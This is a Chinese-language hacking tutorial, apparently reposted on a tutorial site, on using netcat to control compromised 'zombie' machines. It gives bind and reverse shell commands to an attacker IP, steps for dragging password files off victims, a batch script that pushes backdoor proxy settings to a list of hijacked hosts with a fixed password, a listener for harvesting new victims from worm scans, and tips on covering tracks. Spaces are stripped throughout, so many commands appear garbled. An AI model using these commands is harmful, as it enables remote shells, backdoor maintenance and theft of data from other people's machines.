nc.exe高级技巧应用汇总
nc.exe高级技巧应用汇总
发布时间:2016-12-26 来源:查字典编辑
摘要:nc.exe高级技巧应用汇总文章作者:zhoutree0.写在前面的话1.Netcat1.10forNT-nc11nt.zip,原始英文信息...

nc.exe高级技巧应用汇总

文章作者:zhoutree

0.写在前面的话

1.Netcat1.10forNT-nc11nt.zip,原始英文信息

2.Netcat1.10forNT帮助信息

3.Netcat1.10常用的命令格式

4.管理肉鸡,更改肉鸡设置

5.下载连接

6.后记

######################################################################

0.写在前面的话

######################################################################

最近工作比较空闲,老是想着怎么自动telnet肉鸡,自动执行命令。来管理自己的肉鸡。

自己写一个程序。功底是不够的,所以只有看了看nc的帮助信息,虽然只看了个半懂,

但是借助于金山词霸2002版本,还是明白了一点东西.

我觉的有必要再总结一下.反正主要是满足我自己的需要.

######################################################################

1.Netcat1.10forNT-nc11nt.zip

######################################################################

BasicFeatures

*Outboundorinboundconnections,TCPorUDP,toorfromanyports

*FullDNSforward/reversechecking,withappropriatewarnings

*Abilitytouseanylocalsourceport

*Abilitytouseanylocally-configurednetworksourceaddress

*Built-inport-scanningcapabilities,withrandomizer

*Canreadcommandlineargumentsfromstandardinputb

*Slow-sendmode,onelineeveryNseconds

*Hexdumpoftransmittedandreceiveddata

*Abilitytoletanotherprogramserviceestablished

connections

*Telnet-optionsresponder

NewforNT

*Abilitytoruninthebackgroundwithoutaconsolewindow

*Abilitytorestartasasingle-threadedservertohandleanew

connection

________________________________________________________________________

Someofthefeaturesofnetcatare:

Outboundorinboundconnections,TCPorUDP,toorfromanyports

FullDNSforward/reversechecking,withappropriatewarnings

Abilitytouseanylocalsourceport

Abilitytouseanylocally-configurednetworksourceaddress

Built-inport-scanningcapabilities,withrandomizer

Built-inloosesource-routingcapability

Canreadcommandlineargumentsfromstandardinput

Slow-sendmode,onelineeveryNseconds

Optionalabilitytoletanotherprogramserviceinboundconnections

Someofthepotentialusesofnetcat:

Scriptbackends

Scanningportsandinventoryingservices

Backuphandlers

Filetransfers

Servertestingandsimulation

Firewalltesting

Proxygatewaying

Networkperformancetesting

Addressspoofingtests

ProtectingXservers

1001otherusesyou`lllikelycomeupwith

Netcat+Encryption=Cryptcat

对比win2000微软的telnet.exe和微软的tlntsvr.exe服务,连接的时候就可以看出来了.

1.1NC.EXE是一个非标准的telnet客户端程序,

1.2还有一个putty.exe客户端程序,提供四种连接模式

-raw-telnet-rlogin-ssh.

######################################################################

2.Netcat1.10forNT帮助信息

######################################################################

C:WINDOWSDesktop>nc-h

[v1.10NT]

connecttosomewhere:nc[-options]hostnameport[s][ports]...

listenforinbound:nc-l-pport[options][hostname][port]

options:

-ddetachfromconsole,backgroundmode(后台模式)

-eproginboundprogramtoexec[dangerous!!]

-ggatewaysource-routinghoppoint[s],upto8

-Gnumsource-routingpointer:4,8,12,...

-hthiscruft(本帮助信息)

-isecsdelayintervalforlinessent,portsscanned(延迟时间)

-llistenmode,forinboundconnects(监听模式,等待连接)

-Llistenharder,re-listenonsocketclose(连接关闭后,仍然继续监听)

-nnumeric-onlyIPaddresses,noDNS(ip数字模式,非dns解析)

-ofilehexdumpoftraffic(十六进制模式输出文件,三段)

-pportlocalportnumber(本地端口)

-rrandomizelocalandremoteports(随机本地远程端口)

-saddrlocalsourceaddress(本地源地址)

-tanswerTELNETnegotiation

-uUDPmode

-vverbose[usetwicetobemoreverbose](-vv更多信息)

-wsecstimeoutforconnectsandfinalnetreads

-zzero-I/Omode[usedforscanning](扫描模式,-vv)

portnumberscanbeindividualorranges:m-n[inclusive]

######################################################################

3.Netcat1.10常用的命令格式

######################################################################

下面引用《沉睡不醒10月15日凌晨》的文章的部分。

3.1.端口的刺探:

nc-vvipport

RIVER[192.168.0.198]19190(?)open//显示是否开放open

3.2.扫描器

nc-vv-w5ipport-portport

nc-vv-zipport-portport

这样扫描会留下大量的痕迹,系统管理员会额外小心

3.3.后门

victimmachine://受害者的机器

nc-l-pport-ecmd.exe//win2000

nc-l-pport-e/bin/sh//unix,linux

attackermachine://攻击者的机器.

ncip-pport//连接victim_IP,然后得到一个shell。

3.4.反向连接

attackermachine://一般是sql2.exe,远程溢出,webdavx3.exe攻击.

//或者wollf的反向连接.

nc-vv-l-pport

victimmachine:

nc-ecmd.exeattackerip-pport

nc-e/bin/shattackerip-pport

或者:

attackermachine:

nc-vv-l-pport1/*用于输入*/

nc-vv-l-pprot2/*用于显示*/

victimmachine:

ncattacker_ipport1|cmd.exe|ncattacker_ipport2

ncattacker_ipport1|/bin/sh|ncattacker_ipport2

139要加参数-s(nc.exe-L-p139-d-ecmd.exe-s对方机器IP)

这样就可以保证nc.exe优先于NETBIOS。

3.5.传送文件:

3.5.1attackermachine<--victimmachine//从肉鸡拖密码文件回来.

nc-d-l-pport<pathfiledest/*attackermachine*/可以shell执行

nc-vvattacker_ipport>pathfile.txt/*victimmachine*/需要Ctrl+C退出

//肉鸡需要gui界面的cmd.exe里面执行(终端登陆,不如安装FTP方便).否则没有办法输入Crl+C.

3.5.2attackermachine-->victimmachine//上传命令文件到肉鸡

nc-vv-l-pport>pathfile.txt/*victimmachine*/需要Ctrl+C退出

nc-dvictim_ipport<pathfiledest/*attackermachine*/可以shell执行

//这样比较好.我们登陆终端.入侵其他的肉鸡.可以选择shell模式登陆.

结论:可以传输ascii,bin文件.可以传输程序文件.

问题:连接某个ip后,传送完成后,需要发送Ctrl+C退出nc.exe.

或者只有再次连接使用pskill.exe杀掉进程.但是是否释放传输文件打开的句柄了?

3.6端口数据抓包.

nc-vv-w2-otest.txtwww.xfocus.net8021-15

<000000583530302053796e746178206572726f72#500Syntaxerror

<000000682c20636f6d6d616e6420222220756e72#,command""unr

<0000007865636f676e697a65642e0d0a#ecognized...

<00000084830000018f#.....

3.7telnet,自动批处理。★★★★★我要重点推荐的东西就是这个.

ncvictim_ipport<pathfile.cmd/*victimmachine*/显示执行过程.

nc-vvvictim_ipport<pathfile.cmd/*victimmachine*/显示执行过程.

nc-dvictim_ipport<pathfile.cmd安静模式.

_______________file.cmd________________________

password

cd%windir%

echo[]=[%windir%]

c:

cd

mdtest

cd/d%windir%system32

netstopsksockserver

snake.exe-configport11111

netstartsksockserver

exit

_______________file.cmd__END___________________

######################################################################

4.管理肉鸡,更改肉鸡设置

######################################################################

4.1比如要统一更改肉鸡上面的代理端口.snake.exe修改为11111服务名称"sksockserver"

使用winshell后门.端口1234密码password

命令格式就是

modi.batyouip.txt

___________modi.bat____________________________

@if"%1"==""echoError:noip.txt&&gotoEND

:start

@echopassword>a.cmd

@echos>>a.cmd

@echocd/d%%windir%%system32>>a.cmd

@netstop"sksockserver">>a.cmd

@snake.exe-configport11111>>a.cmd

@netstart"sksockserver">>a.cmd

@exit>>a.cmd

:auto

@for/f"eol=;tokens=1,2"%%iin(%1)do@(nc.exe-vv-w3%%i1234<a.cmd)

:END

___________modi.bat__END_______________________

4.2

@echooff

colorf0

:start

cls

C:nc-vv-w3-l-p80>>80.txt

gotostart

把防火墙关掉以后运行这个批处理,会监听到许多探测U漏洞的信息,大多

是三条一组--妮姆达病毒扫描你的。这样就会得到肉鸡的.虽然质量不高.

但是也是一种便宜的办法.

肉鸡特征:

1。unicode漏洞

2。guest密码为空,administrators组用户

3。其他漏洞

自己慢慢的爽去吧。不过,再次强调一句,不建议而且是不能破坏国内主机,上去以后将tftp.exe改名。然后用pskill干掉mmc.exe进程,之后是杀毒。做好后门以后,将guest帐号停用,以对付傻瓜扫描器

######################################################################

5.下载连接

######################################################################

5.1http://www.atstake.com/research/tools/network_utilities/

Tool:Netcat1.10forUnix

Version:03.20.96

Platforms:*nix

Tool:Netcat1.1forWin95/98/NT/2000

Version:02.08.98

Platforms:RunsonWin95/98/NT/2000

5.2http://www.xfocus.net/download.php?id=320

名称:cryptcat_nt.zip更新时间:2002-04-05

类别:网络工具平台:Win9x/NT/2000大小:115.8K提交:maxilaw

简介:加密传输的nc。

5.3http://content.443.ch/pub/security/blackhat/Networking/nc/国外的网站

10.03.0215:481305cryptcat.txt

10.03.0215:48245760cryptcat_linux2.tar

10.03.0215:48118533cryptcat_nt.zip

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新安全教程学习
热门安全教程学习
实用技巧子分类